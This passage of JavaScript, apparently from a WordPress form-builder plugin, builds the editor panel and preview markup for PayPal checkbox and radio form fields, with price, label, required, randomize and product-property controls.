			el_choices_dis_mini_label.innerHTML="Delete";
			el_choices_dis_mini_label.style.cssText='padding-left: 2px; padding-right: 2px; font-size:9px';
			
		div_.appendChild(br);
		div_.appendChild(el_choices_mini_label);
		div_.appendChild(el_choices_price_mini_label);
		div_.appendChild(el_choices_dis_mini_label);
		edit_main_td4.appendChild(div_);

	

	
	
	
	
	n=w_choices.length;
	for(j=0; j<n; j++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "br"+j);
			
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_choices"+j);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("value", w_choices[j]);
			el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
			el_choices.setAttribute("onKeyUp", "change_label('"+i+"_label_element"+j+"', this.value); change_label_1('"+i+"_elementlabel_form_id_temp"+j+"', this.value); ");
	
		var el_choices_price = document.createElement('input');
			el_choices_price.setAttribute("id", "el_option_price"+j);
			el_choices_price.setAttribute("type", "text");
			el_choices_price.setAttribute("value", w_choices_price[j]);
			el_choices_price.style.cssText =   "width:50px; margin:1px; padding:0; border-width: 1px";
		if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices_price.style.display = 'none';
			el_choices_price.setAttribute("onKeyUp", "change_value_price('"+i+"_elementform_id_temp"+j+"', this.value)");
			el_choices_price.setAttribute("onKeyPress", "return check_isnum_point(event)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
		if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px; display:none';
		else			
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_choise_price("+j+","+i+")");
			
		edit_main_td4.appendChild(br);
		edit_main_td4.appendChild(el_choices);
		edit_main_td4.appendChild(el_choices_price);
		edit_main_td4.appendChild(el_choices_remove);
	
	}

	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr11.appendChild(edit_main_td11);
	edit_main_tr11.appendChild(edit_main_td11_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr8.style.display="none";
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr9.style.display="none";
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr11);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='input';	type='checkbox'; 
	var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_paypal_checkbox");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
			
 	var adding_randomize = document.createElement("input");
            adding_randomize.setAttribute("type", "hidden");
            adding_randomize.setAttribute("value", w_randomize);
            adding_randomize.setAttribute("name", i+"_randomizeform_id_temp");			
            adding_randomize.setAttribute("id", i+"_randomizeform_id_temp");
	    
	var adding_allow_other= document.createElement("input");
            adding_allow_other.setAttribute("type", "hidden");
            adding_allow_other.setAttribute("value", w_allow_other);
            adding_allow_other.setAttribute("name", i+"_allow_otherform_id_temp");			
            adding_allow_other.setAttribute("id", i+"_allow_otherform_id_temp");
	    
	var adding_allow_other_id= document.createElement("input");
            adding_allow_other_id.setAttribute("type", "hidden");
            adding_allow_other_id.setAttribute("value", w_allow_other_num);
            adding_allow_other_id.setAttribute("name", i+"_allow_other_numform_id_temp");			
            adding_allow_other_id.setAttribute("id", i+"_allow_other_numform_id_temp");
	    
   var div = document.createElement('div');
       	div.setAttribute("id", "main_div");
//tbody sarqac
		
		
	var table = document.createElement('table');
		table.setAttribute("id", i+"_elemet_tableform_id_temp");
	
    var tr = document.createElement('tr');
			
    var td1 = document.createElement('td');
         	td1.setAttribute("valign", 'top');
         	td1.setAttribute("align", 'left');
           	td1.setAttribute("id", i+"_label_sectionform_id_temp");
			
      	var td2 = document.createElement('td');
        	td2.setAttribute("valign", 'top');
         	td2.setAttribute("align", 'left');
           	td2.setAttribute("id", i+"_element_sectionform_id_temp");

      	var br1 = document.createElement('br');
      	var br2 = document.createElement('br');
     	var br3 = document.createElement('br');
      	var br4 = document.createElement('br');
	//	table_little -@ sarqaca tbody table_little darela table_little_t
	var table_little_t = document.createElement('table');
			
	var table_little = document.createElement('tbody');
           	table_little.setAttribute("id", i+"_table_little");
	table_little_t.appendChild(table_little);
	

	    
      	var label = document.createElement('span');
			label.setAttribute("id", i+"_element_labelform_id_temp");
			label.innerHTML = w_field_label;
			label.setAttribute("class", "label");

	    
      	var required = document.createElement('span');
			required.setAttribute("id", i+"_required_elementform_id_temp");
			required.innerHTML = "";
			required.setAttribute("class", "required");
	if(w_required=="yes")
			required.innerHTML = " *";
	n=w_choices.length;
	aaa=false;
	for(j=0; j<n; j++)
	{      	
		var tr_little = document.createElement('tr');
			tr_little.setAttribute("id", i+"_element_tr"+j);
				
		var td_little = document.createElement('td');
			td_little.setAttribute("valign", 'top');
			td_little.setAttribute("id", i+"_td_little"+j);
			td_little.setAttribute("idi", j);
	
		var adding = document.createElement(element);
				adding.setAttribute("type", type);
				adding.setAttribute("id", i+"_elementform_id_temp"+j);
				adding.setAttribute("name", i+"_elementform_id_temp"+j);
				adding.setAttribute("value", w_choices_price[j]);
			if(w_allow_other=="yes" && j==w_allow_other_num)
			{
				adding.setAttribute("other", "1");
				adding.setAttribute("onclick", "if(set_checked('"+i+"','"+j+"','form_id_temp')) show_other_input('"+i+"','form_id_temp');");
			}
			else
				adding.setAttribute("onclick", "set_checked('"+i+"','"+j+"','form_id_temp')");
			
		if(w_choices_checked[j]=='1')
				adding.setAttribute("checked", "checked");
				
				
				
		var label_adding = document.createElement('label');
				label_adding.setAttribute("id", i+"_label_element"+j);
				label_adding.setAttribute("class","ch_rad_label");
				label_adding.setAttribute("for",i+"_elementform_id_temp"+j);
				label_adding.innerHTML = w_choices[j];
				
		var adding_ch_label = document.createElement('input');
				adding_ch_label.setAttribute("type", "hidden");
				adding_ch_label.setAttribute("id", i+"_elementlabel_form_id_temp"+j);
				adding_ch_label.setAttribute("name", i+"_elementform_id_temp"+j+"_label");
				adding_ch_label.setAttribute("value", w_choices[j]);
				
		td_little.appendChild(adding);
		td_little.appendChild(label_adding);
		td_little.appendChild(adding_ch_label);
		tr_little.appendChild(td_little);
		table_little.appendChild(tr_little);
		
		if(w_choices_checked[j]=='1')
			if(w_allow_other=="yes" && j==w_allow_other_num)
				aaa=true;
	
	}			
	
		var div_ = document.createElement('div');
			div_.setAttribute("id", i+"_divform_id_temp");

      	var main_td  = document.getElementById('show_table');
	
      
      	td1.appendChild(label);
      	td1.appendChild(required);
        td2.appendChild(adding_type);
  
        td2.appendChild(adding_required);
        td2.appendChild(adding_randomize);
       	td2.appendChild(adding_allow_other);
       	td2.appendChild(adding_allow_other_id);
		td2.appendChild(table_little_t);
		td2.appendChild(div_);
      	tr.appendChild(td1);
      	tr.appendChild(td2);
      	table.appendChild(tr);
      

      	div.appendChild(table);
      	div.appendChild(br3);
      	main_td.appendChild(div);
	add_id_and_name(i, 'type_checkbox');
		
	if(w_field_label_pos=="top")
				label_top(i);
				
	if(w_flow=="hor")
				
				flow_hor(i);
change_class(w_class, i);
refresh_attr(i, 'type_checkbox');


	if(w_quantity=="yes")
				add_quantity(i);
							
// form_maker_open_in_popup(11);
if(aaa)
{
	show_other_input(i);
}
	// enable_modals();
	
add_properties(i, w_property, w_property_values, w_property_type);
spider_popup();
}

function type_paypal_radio(i, w_field_label, w_field_label_pos, w_flow, w_choices, w_choices_price, w_choices_checked, w_required, w_randomize, w_allow_other, w_allow_other_num, w_class, w_attr_name, w_attr_value,  w_property, w_property_type, w_property_values, w_quantity ){
	document.getElementById("element_type").value="type_paypal_radio";

	delete_last_child();
// edit table	
	var edit_div  = document.createElement('div');
		edit_div.setAttribute("id", "edit_div");
		edit_div.setAttribute("style", "border-top:1px dotted black;padding:10px; padding:10px; padding-top:0px; padding-bottom:0px; margin-top:10px;");
		
	var edit_main_table  = document.createElement('table');
		edit_main_table.setAttribute("id", "edit_main_table");
		edit_main_table.setAttribute("cellpadding", "0");
		edit_main_table.setAttribute("cellspacing", "0");
		
	var edit_main_tr1  = document.createElement('tr');
      		edit_main_tr1.setAttribute("valing", "top");
		
	var edit_main_tr2  = document.createElement('tr');
      		edit_main_tr2.setAttribute("valing", "top");
		
	var edit_main_tr3  = document.createElement('tr');
      		edit_main_tr3.setAttribute("valing", "top");
		
	var edit_main_tr4  = document.createElement('tr');
      		edit_main_tr4.setAttribute("valing", "top");
		
	var edit_main_tr5  = document.createElement('tr');
      		edit_main_tr5.setAttribute("valing", "top");
			
	var edit_main_tr6  = document.createElement('tr');
      		edit_main_tr6.setAttribute("valing", "top");
			
	var edit_main_tr7  = document.createElement('tr');
      		edit_main_tr7.setAttribute("valing", "top");
			
	var edit_main_tr8  = document.createElement('tr');
      		edit_main_tr8.setAttribute("valing", "top");

	var edit_main_tr9  = document.createElement('tr');
      		edit_main_tr9.setAttribute("valing", "top");

	var edit_main_tr10  = document.createElement('tr');
      		edit_main_tr10.setAttribute("valing", "top");

	var edit_main_tr11  = document.createElement('tr');
      		edit_main_tr11.setAttribute("valing", "top");

	var edit_main_td1 = document.createElement('td');
		edit_main_td1.style.cssText = "padding-top:10px";	
	var edit_main_td1_1 = document.createElement('td');
		edit_main_td1_1.style.cssText = "padding-top:10px";		
	var edit_main_td2 = document.createElement('td');
		edit_main_td2.style.cssText = "padding-top:10px";
	var edit_main_td2_1 = document.createElement('td');
		edit_main_td2_1.style.cssText = "padding-top:10px";

	var edit_main_td3 = document.createElement('td');
		edit_main_td3.style.cssText = "padding-top:10px";
	var edit_main_td3_1 = document.createElement('td');
		edit_main_td3_1.style.cssText = "padding-top:10px";

	var edit_main_td4 = document.createElement('td');
		edit_main_td4.style.cssText = "padding-top:10px";
	var edit_main_td4_1 = document.createElement('td');
		edit_main_td4_1.style.cssText = "padding-top:10px; vertical-align:top;";
		
		edit_main_td4.setAttribute("id", "choices");
		
		
	var edit_main_td10 = document.createElement('td');
		edit_main_td10.style.cssText = "padding-top:10px";
	var edit_main_td10_1 = document.createElement('td');
		edit_main_td10_1.style.cssText = "padding-top:10px";

	var edit_main_td5 = document.createElement('td');
		edit_main_td5.style.cssText = "padding-top:10px";
	var edit_main_td5_1 = document.createElement('td');
		edit_main_td5_1.style.cssText = "padding-top:10px";
				
	var edit_main_td6 = document.createElement('td');
		edit_main_td6.style.cssText = "padding-top:10px";
	var edit_main_td6_1 = document.createElement('td');
		edit_main_td6_1.style.cssText = "padding-top:10px";
		
	var edit_main_td7 = document.createElement('td');
		edit_main_td7.style.cssText = "padding-top:10px";
	var edit_main_td7_1 = document.createElement('td');
		edit_main_td7_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td8 = document.createElement('td');
		edit_main_td8.style.cssText = "padding-top:10px";
	var edit_main_td8_1 = document.createElement('td');
		edit_main_td8_1.style.cssText = "padding-top:10px";
		  
	var edit_main_td9 = document.createElement('td');
		edit_main_td9.style.cssText = "padding-top:10px";
	var edit_main_td9_1 = document.createElement('td');
		edit_main_td9_1.style.cssText = "padding-top:10px";
		  
		  
	var edit_main_td11 = document.createElement('td');
		edit_main_td11.style.cssText = "padding-top:10px";
	var edit_main_td11_1 = document.createElement('td');
		edit_main_td11_1.style.cssText = "padding-top:10px";
		  
	var el_label_label = document.createElement('label');
			        el_label_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_label_label.innerHTML = "Field label";
	
	var el_label_textarea = document.createElement('textarea');
                el_label_textarea.setAttribute("id", "edit_for_label");
                el_label_textarea.setAttribute("rows", "4");
                el_label_textarea.style.cssText = "width:200px;";
                el_label_textarea.setAttribute("onKeyUp", "change_label('"+i+"_element_labelform_id_temp', this.value)");
				el_label_textarea.innerHTML = w_field_label;
		
	var el_label_position_label = document.createElement('label');
			        el_label_position_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_position_label.innerHTML = "Field label position";
	
	var el_label_position1 = document.createElement('input');
                el_label_position1.setAttribute("id", "edit_for_label_position_top");
                el_label_position1.setAttribute("type", "radio");
                el_label_position1.setAttribute("value", "left");
                

                el_label_position1.setAttribute("name", "edit_for_label_position");
                el_label_position1.setAttribute("onchange", "label_left("+i+")");
				el_label_position1.setAttribute("checked", "checked");
		Left = document.createTextNode("Left");
		
	var el_label_position2 = document.createElement('input');
                el_label_position2.setAttribute("id", "edit_for_label_position_left");
                el_label_position2.setAttribute("type", "radio");

                el_label_position2.setAttribute("value", "top");
	

                el_label_position2.setAttribute("name", "edit_for_label_position");
                el_label_position2.setAttribute("onchange", "label_top("+i+")");
		Top = document.createTextNode("Top");
		
	if(w_field_label_pos=="top")
	
				el_label_position2.setAttribute("checked", "checked");
	else
				el_label_position1.setAttribute("checked", "checked");
	
	var el_label_flow = document.createElement('label');
			        el_label_flow.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_label_flow.innerHTML = "Relative Position";

	var el_flow_vertical = document.createElement('input');
                el_flow_vertical.setAttribute("id", "edit_for_flow_vertical");
                el_flow_vertical.setAttribute("type", "radio");
                el_flow_vertical.setAttribute("value", "ver");
                el_flow_vertical.setAttribute("name", "edit_for_flow");
                el_flow_vertical.setAttribute("onchange", "flow_ver("+i+")");
		Vertical = document.createTextNode("Vertical");
		
	var el_flow_horizontal = document.createElement('input');
            el_flow_horizontal.setAttribute("id", "edit_for_flow_horizontal");
            el_flow_horizontal.setAttribute("type", "radio");
            el_flow_horizontal.setAttribute("value", "hor");
            el_flow_horizontal.setAttribute("name", "edit_for_flow");
            el_flow_horizontal.setAttribute("onchange", "flow_hor("+i+")");
		Horizontal = document.createTextNode("Horizontal");
		
	if(w_flow=="hor")
				el_flow_horizontal.setAttribute("checked", "checked");
	else
				el_flow_vertical.setAttribute("checked", "checked");
				
	var el_style_label = document.createElement('label');
	    el_style_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_style_label.innerHTML = "Class name";
	
	var el_style_textarea = document.createElement('input');
        el_style_textarea.setAttribute("id", "element_style");
		el_style_textarea.setAttribute("type", "text");
		el_style_textarea.setAttribute("value", w_class);
        el_style_textarea.style.cssText = "width:200px;";
        el_style_textarea.setAttribute("onChange", "change_class(this.value,'"+i+"')");
	
	var el_required_label = document.createElement('label');
	        el_required_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_required_label.innerHTML = "Required";
	
	var el_required = document.createElement('input');
                el_required.setAttribute("id", "el_send");
                el_required.setAttribute("type", "checkbox");
                el_required.setAttribute("value", "yes");
                el_required.setAttribute("onclick", "set_required('"+i+"_required')");
	if(w_required=="yes")
			
                el_required.setAttribute("checked", "checked");

	var el_quantity_label = document.createElement('label');
	    el_quantity_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_quantity_label.innerHTML = "Quantity property";
		
	var el_quantity = document.createElement('input');
        el_quantity.setAttribute("type", "checkbox");
        el_quantity.setAttribute("value", "yes");
        el_quantity.setAttribute("onclick", "add_quantity('"+i+"')");
	
	if(w_quantity=="yes")
		el_quantity.setAttribute("checked", "checked");
	
				
	var el_randomize_label = document.createElement('label');
				el_randomize_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_randomize_label.innerHTML = "Randomize in frontend";
	
	var el_randomize = document.createElement('input');
                el_randomize.setAttribute("id", "el_randomize");
                el_randomize.setAttribute("type", "checkbox");
                el_randomize.setAttribute("value", "yes");
                el_randomize.setAttribute("onclick", "set_randomize('"+i+"_randomizeform_id_temp')");
	if(w_randomize=="yes")
			    el_randomize.setAttribute("checked", "checked");

	var el_allow_other_label = document.createElement('label');
				el_allow_other_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
				el_allow_other_label.innerHTML = "Allow other";
	
	var el_allow_other = document.createElement('input');
                el_allow_other.setAttribute("id", "el_allow_other");
                el_allow_other.setAttribute("type", "checkbox");
                el_allow_other.setAttribute("value", "yes");
                el_allow_other.setAttribute("onclick", "set_allow_other('"+i+"','radio')");
	if(w_allow_other=="yes")
			    el_allow_other.setAttribute("checked", "checked");

	var el_product_option_label = document.createElement('label');
	    el_product_option_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px;";
		el_product_option_label.innerHTML = "Product properties";
	
	var el_product_option_add_a = document.createElement('a');
		// el_product_option_add_a.setAttribute("rel", "{handler: 'iframe', size: {x: 650, y: 375}}"	);
		// el_product_option_add_a.setAttribute("href","index.php?option=com_formmaker&task=product_option_fmc&field_id="+i+"&tmpl=component");
		// el_product_option_add_a.setAttribute("class","modal");
    el_product_option_add_a.setAttribute("href", url_for_ajax + "?action=product_option_fmc&field_id=" + i + "&url_for_ajax=" + url_for_ajax + "&width=600&height=400&TB_iframe=1");
		el_product_option_add_a.setAttribute("class","thickbox-preview");


	var el_product_option_add_img = document.createElement('img');
		el_product_option_add_img.setAttribute("src", fmc_plugin_url + "/images/add.png");
		
	var el_product_option_add_ul = document.createElement('ul');
		el_product_option_add_ul.setAttribute("id", 'option_ul');
		el_product_option_add_ul.style.cssText="list-style-type: none; padding:0px"
				
				
	el_product_option_add_a.appendChild(el_product_option_add_img);
	

	var el_attr_label = document.createElement('label');
	                el_attr_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
			el_attr_label.innerHTML = "Additional Attributes";
	var el_attr_add = document.createElement('img');
                el_attr_add.setAttribute("id", "el_choices_add");
           	el_attr_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_attr_add.style.cssText = 'cursor:pointer; margin-left:68px';
            	el_attr_add.setAttribute("title", 'add');
                el_attr_add.setAttribute("onClick", "add_attr("+i+", 'type_checkbox')");
	var el_attr_table = document.createElement('table');
                el_attr_table.setAttribute("id", 'attributes');
                el_attr_table.setAttribute("border", '0');
        	el_attr_table.style.cssText = 'margin-left:0px';
	var el_attr_tr_label = document.createElement('tr');
                el_attr_tr_label.setAttribute("idi", '0');
	var el_attr_td_name_label = document.createElement('th');
            	el_attr_td_name_label.style.cssText = 'width:100px';
	var el_attr_td_value_label = document.createElement('th');
            	el_attr_td_value_label.style.cssText = 'width:100px';
	var el_attr_td_X_label = document.createElement('th');
            	el_attr_td_X_label.style.cssText = 'width:10px';
	var el_attr_name_label = document.createElement('label');
	                el_attr_name_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_name_label.innerHTML = "Name";
			
	var el_attr_value_label = document.createElement('label');
	                el_attr_value_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 11px";
			el_attr_value_label.innerHTML = "Value";
			
	el_attr_table.appendChild(el_attr_tr_label);
	el_attr_tr_label.appendChild(el_attr_td_name_label);
	el_attr_tr_label.appendChild(el_attr_td_value_label);
	el_attr_tr_label.appendChild(el_attr_td_X_label);
	el_attr_td_name_label.appendChild(el_attr_name_label);
	el_attr_td_value_label.appendChild(el_attr_value_label);
	
	n=w_attr_name.length;
	for(j=1; j<=n; j++)
	{	
		var el_attr_tr = document.createElement('tr');
			el_attr_tr.setAttribute("id", "attr_row_"+j);
			el_attr_tr.setAttribute("idi", j);
		var el_attr_td_name = document.createElement('td');
			el_attr_td_name.style.cssText = 'width:100px';
		var el_attr_td_value = document.createElement('td');
			el_attr_td_value.style.cssText = 'width:100px';
		
		var el_attr_td_X = document.createElement('td');
		var el_attr_name = document.createElement('input');
	
			el_attr_name.setAttribute("type", "text");
	
			el_attr_name.style.cssText = "width:100px";
			el_attr_name.setAttribute("value", w_attr_name[j-1]);
			el_attr_name.setAttribute("id", "attr_name"+j);
			el_attr_name.setAttribute("onChange", "change_attribute_name("+i+", this, 'type_checkbox')");
			
		var el_attr_value = document.createElement('input');
	
			el_attr_value.setAttribute("type", "text");
			el_attr_value.style.cssText = "width:100px";
			el_attr_value.setAttribute("value", w_attr_value[j-1]);
			el_attr_value.setAttribute("id", "attr_value"+j);
			el_attr_value.setAttribute("onChange", "change_attribute_value("+i+", "+j+", 'type_checkbox')");
	
		var el_attr_remove = document.createElement('img');
			el_attr_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_attr_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
			el_attr_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_attr_remove.setAttribute("align", 'top');
			el_attr_remove.setAttribute("onClick", "remove_attr("+j+", "+i+", 'type_checkbox')");
		el_attr_table.appendChild(el_attr_tr);
		el_attr_tr.appendChild(el_attr_td_name);
		el_attr_tr.appendChild(el_attr_td_value);
		el_attr_tr.appendChild(el_attr_td_X);
		el_attr_td_name.appendChild(el_attr_name);
		el_attr_td_value.appendChild(el_attr_value);
		el_attr_td_X.appendChild(el_attr_remove);
		
	}

	var el_choices_label = document.createElement('label');
			        el_choices_label.style.cssText ="color:#00aeef; font-weight:bold; font-size: 13px";
		el_choices_label.innerHTML = "Options ";

	
	var el_choices_add = document.createElement('img');
                el_choices_add.setAttribute("id", "el_choices_add");
           	el_choices_add.setAttribute("src", fmc_plugin_url+'/images/add.png');
            	el_choices_add.style.cssText = 'cursor:pointer;';
            	el_choices_add.setAttribute("title", 'add');
                el_choices_add.setAttribute("onClick", "add_choise_price('radio',"+i+")");
				
	var t  = document.getElementById('edit_table');
	
	var br = document.createElement('br');
	var br1 = document.createElement('br');
	var br2 = document.createElement('br');
	var br3 = document.createElement('br');
	var br4 = document.createElement('br');
	var br5 = document.createElement('br');
	var br6 = document.createElement('br');
	

	edit_main_td1.appendChild(el_label_label);
	edit_main_td1_1.appendChild(el_label_textarea);

	edit_main_td2.appendChild(el_label_position_label);
	edit_main_td2_1.appendChild(el_label_position1);
	edit_main_td2_1.appendChild(Left);
	edit_main_td2_1.appendChild(br2);
	edit_main_td2_1.appendChild(el_label_position2);
	edit_main_td2_1.appendChild(Top);
	
	edit_main_td3.appendChild(el_label_flow);
	edit_main_td3_1.appendChild(el_flow_vertical);
	edit_main_td3_1.appendChild(Vertical);
	edit_main_td3_1.appendChild(br4);
	edit_main_td3_1.appendChild(el_flow_horizontal);
	edit_main_td3_1.appendChild(Horizontal);

	edit_main_td6.appendChild(el_style_label);
	edit_main_td6_1.appendChild(el_style_textarea);
	
	edit_main_td5.appendChild(el_required_label);
	edit_main_td5_1.appendChild(el_required);
	
	edit_main_td8.appendChild(el_randomize_label);
	edit_main_td8_1.appendChild(el_randomize);
	
	edit_main_td9.appendChild(el_allow_other_label);
	edit_main_td9_1.appendChild(el_allow_other);
	
	edit_main_td11.appendChild(el_quantity_label);
	edit_main_td11_1.appendChild(el_quantity);

	edit_main_td10.appendChild(el_product_option_label);
	edit_main_td10.appendChild(el_product_option_add_ul);
	edit_main_td10_1.appendChild(el_product_option_add_a);
	
	edit_main_td7.appendChild(el_attr_label);
	edit_main_td7.appendChild(el_attr_add);
	edit_main_td7.appendChild(br6);
	edit_main_td7.appendChild(el_attr_table);
	edit_main_td7.setAttribute("colspan", "2");
	
	edit_main_td4.appendChild(el_choices_label);
	edit_main_td4_1.appendChild(el_choices_add);

		var div_ = document.createElement('div');
			div_.style.cssText = 'border-bottom:1px dotted black; width: 187px;';
		var br = document.createElement('br');
		
		var el_choices_mini_label = document.createElement('b');
			el_choices_mini_label.innerHTML="Product name";
			el_choices_mini_label.style.cssText='padding-right: 15px; padding-left: 15px; font-size:9px';
			
		var el_choices_price_mini_label = document.createElement('b');
			el_choices_price_mini_label.innerHTML="Price";
			el_choices_price_mini_label.style.cssText='padding-right: 15px; padding-left: 15px;  font-size:9px';
	
		var el_choices_remove_mini_label = document.createElement('b');
			el_choices_remove_mini_label.innerHTML="Empty value";
			el_choices_remove_mini_label.style.cssText='padding-right: 2px; padding-left: 2px; font-size:9px';
			
		var el_choices_dis_mini_label = document.createElement('b');
			el_choices_dis_mini_label.innerHTML="Delete";
			el_choices_dis_mini_label.style.cssText='padding-left: 2px; padding-right: 2px; font-size:9px';
			
		div_.appendChild(br);
		div_.appendChild(el_choices_mini_label);
		div_.appendChild(el_choices_price_mini_label);
		div_.appendChild(el_choices_dis_mini_label);
		edit_main_td4.appendChild(div_);


	n=w_choices.length;
	for(j=0; j<n; j++)
	{	
		var br = document.createElement('br');
			br.setAttribute("id", "br"+j);
			
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_choices"+j);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("value", w_choices[j]);
			el_choices.style.cssText =   "width:100px; margin:0; padding:0; border-width: 1px";
			el_choices.setAttribute("onKeyUp", "change_label('"+i+"_label_element"+j+"', this.value); change_label_1('"+i+"_elementlabel_form_id_temp"+j+"', this.value); ");
	
		var el_choices_price = document.createElement('input');
			el_choices_price.setAttribute("id", "el_option_price"+j);
			el_choices_price.setAttribute("type", "text");
			el_choices_price.setAttribute("value", w_choices_price[j]);
			el_choices_price.style.cssText =   "width:50px; margin:1px; padding:0; border-width: 1px";
		if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices_price.style.display = 'none';
			el_choices_price.setAttribute("onKeyUp", "change_value_price('"+i+"_elementform_id_temp"+j+"', this.value)");
			el_choices_price.setAttribute("onKeyPress", "return check_isnum_point(event)");

		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_choices"+j+"_remove");
			el_choices_remove.setAttribute("src", fmc_plugin_url+'/images/delete.png');
		if(w_allow_other=="yes" && j==w_allow_other_num)
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px; display:none';
		else			
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:3px';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_choise_price("+j+","+i+")");
			
		edit_main_td4.appendChild(br);
		edit_main_td4.appendChild(el_choices);
		edit_main_td4.appendChild(el_choices_price);
		edit_main_td4.appendChild(el_choices_remove);
	
	}


	edit_main_tr1.appendChild(edit_main_td1);
	edit_main_tr1.appendChild(edit_main_td1_1);
	edit_main_tr2.appendChild(edit_main_td2);
	edit_main_tr2.appendChild(edit_main_td2_1);
	edit_main_tr3.appendChild(edit_main_td3);
	edit_main_tr3.appendChild(edit_main_td3_1);
	
	edit_main_tr6.appendChild(edit_main_td6);
	edit_main_tr6.appendChild(edit_main_td6_1);
	edit_main_tr7.appendChild(edit_main_td7);
	edit_main_tr5.appendChild(edit_main_td5);
	edit_main_tr5.appendChild(edit_main_td5_1);
	edit_main_tr4.appendChild(edit_main_td4);
	edit_main_tr4.appendChild(edit_main_td4_1);
	edit_main_tr8.appendChild(edit_main_td8);
	edit_main_tr8.appendChild(edit_main_td8_1);
	edit_main_tr8.style.display="none";
	edit_main_tr9.appendChild(edit_main_td9);
	edit_main_tr9.appendChild(edit_main_td9_1);
	edit_main_tr9.style.display="none";
	edit_main_tr10.appendChild(edit_main_td10);
	edit_main_tr10.appendChild(edit_main_td10_1);
	edit_main_tr11.appendChild(edit_main_td11);
	edit_main_tr11.appendChild(edit_main_td11_1);
	edit_main_table.appendChild(edit_main_tr1);
	edit_main_table.appendChild(edit_main_tr2);
	edit_main_table.appendChild(edit_main_tr3);
	edit_main_table.appendChild(edit_main_tr6);
	edit_main_table.appendChild(edit_main_tr5);
	edit_main_table.appendChild(edit_main_tr8);
	edit_main_table.appendChild(edit_main_tr9);
	edit_main_table.appendChild(edit_main_tr4);
	edit_main_table.appendChild(edit_main_tr11);
	edit_main_table.appendChild(edit_main_tr10);
	edit_main_table.appendChild(edit_main_tr7);
	edit_div.appendChild(edit_main_table);
	
	t.appendChild(edit_div);
	
//show table

	element='input';	type='radio'; 
		var adding_type = document.createElement("input");
            adding_type.setAttribute("type", "hidden");
            adding_type.setAttribute("value", "type_paypal_radio");
            adding_type.setAttribute("name", i+"_typeform_id_temp");
            adding_type.setAttribute("id", i+"_typeform_id_temp");
	var adding_required = document.createElement("input");
            adding_required.setAttribute("type", "hidden");
            adding_required.setAttribute("value", w_required);
            adding_required.setAttribute("name", i+"_requiredform_id_temp");			
            adding_required.setAttribute("id", i+"_requiredform_id_temp");
	    
	var adding_randomize = document.createElement("input");
